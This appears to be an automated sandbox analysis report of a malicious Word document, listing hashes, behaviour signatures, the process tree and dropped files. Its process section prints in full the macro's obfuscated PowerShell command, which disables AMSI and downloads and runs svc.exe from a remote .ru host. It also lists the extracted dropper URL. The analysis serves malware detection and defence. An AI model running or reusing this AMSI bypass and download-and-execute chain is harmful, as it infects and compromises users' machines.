Analysis

  • max time kernel
    139s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-02-2025 05:14

General

  • Target

    d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc

  • Size

    119KB

  • MD5

    7564fc9db09034f49408c33fae34a335

  • SHA1

    c0a49e5e0054673b3cea2a9e279c896eb2ebec27

  • SHA256

    d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21

  • SHA512

    7e0cc0628d8d6c00c713fa9318d0ec0735f19d449bcf86e6c93e837bd55364d2029b4d309538fc8be5d1b5035499572d2f5e3480593576171b9e6ca059e3b94a

  • SSDEEP

    1536:J7LlLq2TvoxHCQQv56sSFXC5uHQA1pzJGrDwQwMw1UV6XhnOQ5w:dLzTKiQa2SgPpzErF41k6ksw

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://goodmastersportunicum.ru/load/svc.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFiowjhOHWOHEOUF = $null; sleep 3; $text = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W1JlZl0uQXNzZW1ibHkuR2V0VHlwZSgkQ2VvaXV3am9ldXlmdykuR2V0RmllbGQoJEZFSWZ3dWlvZWhmYWl3eVlPRVRXVFJ1d3llICsgJEVGODAzNHVvd2lleXBvd2l1ZSwiTm9uUCIgKyAidWIiICsgImxpYyxTdCIgKyAiYXRpYyIpLlNldFZhbHVlKCRERmlvd2poT0hXT0hFT1VGLCR0cnVlKQ==')); iex $text; $BBB = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFVVVSA9ICdodHRwOi8vZ29vZG1hc3RlcnNwb3J0dW5pY3VtLnJ1L2xvYWQvc3ZjLmV4ZSc7ICRQUFAgPSAnQzpcVXNlcnNcUHVibGljXExpYnJhcmllc1xzdmMuZXhlJzsgJFdXVyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRXV1cuRG93bmxvYWRGaWxlKCRVVVUsICRQUFApOyBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkUFBQOw==')); $CCC = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($BBB)); powershell -E $CCC;
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABVAFUAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AZwBvAG8AZABtAGEAcwB0AGUAcgBzAHAAbwByAHQAdQBuAGkAYwB1AG0ALgByAHUALwBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnADsAIAAkAFAAUABQACAAPQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAHMAdgBjAC4AZQB4AGUAJwA7ACAAJABXAFcAVwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFcAVwBXAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAVQBVACwAIAAkAFAAUABQACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAUABQAFAAOwA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4524

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    240B

    MD5

    bd8143815063f324d262df4a2bd97a6b

    SHA1

    4b2d35dd332310c967fa05963a0342a8208b8cb3

    SHA256

    3e7940349792d64fb52b32a0dc0cee55177330589fc07d2fb19cfabf23a6bd2b

    SHA512

    31d0829b4ad28340b8a42ccd6ab5ad8c7ea6ac72a5f4ec5457e1d95479b53b62fb4e0722ced62705b9b06b7c2e56f7a54a968ca633f49b9c0bdb1937f8203bb6

  • C:\Users\Admin\AppData\Local\Temp\TCDBFB5.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jsvpxoyv.q3a.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

    Filesize

    16B

    MD5

    d29962abc88624befc0135579ae485ec

    SHA1

    e40a6458296ec6a2427bcb280572d023a9862b31

    SHA256

    a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

    SHA512

    4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

  • memory/1912-40-0x000001D8B7150000-0x000001D8B7172000-memory.dmp

    Filesize

    136KB

  • memory/2324-8-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-27-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-0-0x00007FFA51E90000-0x00007FFA51EA0000-memory.dmp

    Filesize

    64KB

  • memory/2324-10-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-14-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-15-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-17-0x00007FFA4F890000-0x00007FFA4F8A0000-memory.dmp

    Filesize

    64KB

  • memory/2324-16-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-13-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-12-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-9-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-11-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-18-0x00007FFA4F890000-0x00007FFA4F8A0000-memory.dmp

    Filesize

    64KB

  • memory/2324-7-0x00007FFA51E90000-0x00007FFA51EA0000-memory.dmp

    Filesize

    64KB

  • memory/2324-29-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-28-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-4-0x00007FFA51E90000-0x00007FFA51EA0000-memory.dmp

    Filesize

    64KB

  • memory/2324-5-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-6-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-2-0x00007FFA51E90000-0x00007FFA51EA0000-memory.dmp

    Filesize

    64KB

  • memory/2324-3-0x00007FFA51E90000-0x00007FFA51EA0000-memory.dmp

    Filesize

    64KB

  • memory/2324-70-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-71-0x00007FFA91EAD000-0x00007FFA91EAE000-memory.dmp

    Filesize

    4KB

  • memory/2324-72-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-73-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-74-0x00007FFA91E10000-0x00007FFA92005000-memory.dmp

    Filesize

    2.0MB

  • memory/2324-1-0x00007FFA91EAD000-0x00007FFA91EAE000-memory.dmp

    Filesize

    4KB